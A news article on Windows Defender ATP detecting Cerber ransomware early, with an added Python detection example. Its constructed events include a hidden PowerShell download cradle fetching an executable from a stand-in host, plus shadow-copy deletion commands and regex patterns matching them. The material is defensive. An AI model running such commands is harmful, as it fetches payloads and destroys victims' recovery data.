Windows 10 could help enterprises more quickly detect and stop the further spread of a ransomware infection, a recent Microsoft blog post said. The post, published Monday, claims that Windows Defender Advanced Threat Protection (ATP) helps businesses better understand early cases, and use that information to protect their network.
Much like a physical illness, catching a cybersecurity infection early is key to mitigating potential damage and avoiding complex problems. If a ransomware attack is perpetrated, there are steps that an enterprise can take to limit the complications.
“As attacks reach the post-breach or post-infection layer–when endpoint antimalware fails to stop a ransomware infection–enterprises can benefit from post-breach detection solutions that provide comprehensive artifact information and the ability to quickly pivot investigations using these artifacts,” the post said.
The research cited in the blog post said that some of the more prevalent families of ransomware campaigns can last for “days or even weeks, all the while employing similar files and techniques.” But, if the affected business can investigate what the blog called “patient zero,” or the initial infection, they can “effectively stop ransomware epidemics,” the post said.
That means if an antimalware tool fails to prevent the actual attack in the first place, Windows 10 should be able to prevent it from growing further and turning into an epidemic. It is able to do so because Windows Defender ATP can point out the original infections and work to help protect the network and stop the subsequent attacks, the post said.
The research looked specifically at a type of malware known as Cerber ransomware, which was particularly prevalent during the holiday season. During the test, Cerber ransomware was downloaded and, when it tried to launch a PowerShell command, it was detected by Windows Defender ATP.
“Windows Defender ATP also generated an alert when the PowerShell script connected to a TOR anonymization website through a public proxy to download an executable,” the post said. “Security operations center (SOC) personnel could use such alerts to get the source IP and block this IP address at the firewall, preventing other machines from downloading the executable.”
Windows Defender ATP also generated alerts when the ransomware tried to delete system restore points and volume shadow copies. According to the post, more updates are coming that will enable “network isolation of compromised machines” and the ability to “quarantine and prevent subsequent execution of files.”
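To make the alert-then-pivot workflow the post describes concrete, here is an added example (my own illustration, not Microsoft's or Windows Defender ATP's code) that runs two detections over constructed process-creation records: PowerShell spawned by an Office application to download a file, and shadow copy deletion via vssadmin or wmic. The event records, host names and rule names are all constructed; the patient_zero helper shows the pivot to the earliest affected host.

```python
import re

# Constructed process-creation events in a Sysmon-like shape; not real telemetry.
EVENTS = [
    {"ts": "2017-01-10T09:02:11", "host": "ws-17", "parent": "winword.exe",
     "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c (New-Object Net.WebClient)"
                ".DownloadFile('http://proxy.example/x.exe','x.exe')"},
    {"ts": "2017-01-10T09:02:40", "host": "ws-17", "parent": "x.exe",
     "image": "vssadmin.exe", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2017-01-10T09:14:05", "host": "ws-23", "parent": "x.exe",
     "image": "wmic.exe", "cmdline": "wmic shadowcopy delete"},
    {"ts": "2017-01-10T09:20:00", "host": "ws-05", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]

# Each rule is a predicate over one event; names are my own, not ATP alert titles.
RULES = {
    "shadow_copy_deletion": lambda e: e["image"] in ("vssadmin.exe", "wmic.exe")
        and re.search(r"delete\s+shadows|shadowcopy\s+delete", e["cmdline"], re.I),
    "office_spawns_powershell_downloader": lambda e: e["image"] == "powershell.exe"
        and e["parent"] in ("winword.exe", "excel.exe", "outlook.exe")
        and re.search(r"downloadfile|downloadstring|invoke-webrequest", e["cmdline"], re.I),
}


def evaluate(events):
    """Return one alert per (event, rule) match, ordered by timestamp."""
    alerts = []
    for e in sorted(events, key=lambda e: e["ts"]):  # ISO timestamps sort as text
        for name, matches in RULES.items():
            if matches(e):
                alerts.append({"ts": e["ts"], "host": e["host"], "rule": name,
                               "cmdline": e["cmdline"]})
    return alerts


def patient_zero(alerts):
    """Earliest alerting host: the pivot point for scoping the outbreak."""
    return min(alerts, key=lambda a: a["ts"])["host"] if alerts else None


def affected_hosts(alerts):
    """Distinct hosts with at least one alert, for isolation or follow-up."""
    return sorted({a["host"] for a in alerts})


if __name__ == "__main__":
    found = evaluate(EVENTS)
    for a in found:
        print(a["ts"], a["host"], a["rule"], "|", a["cmdline"])
    print("patient zero:", patient_zero(found), "| affected:", affected_hosts(found))
```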
The 3 big takeaways for TechRepublic readers
- According to Windows researchers, Windows 10 can help prevent a ransomware infection from turning into a full-on epidemic.
- Windows Defender Advanced Threat Protection (ATP) picks up artifact information from patient zero to understand the ransomware family and alert security professionals.
- Future updates will add quarantine capabilities and network isolation as well.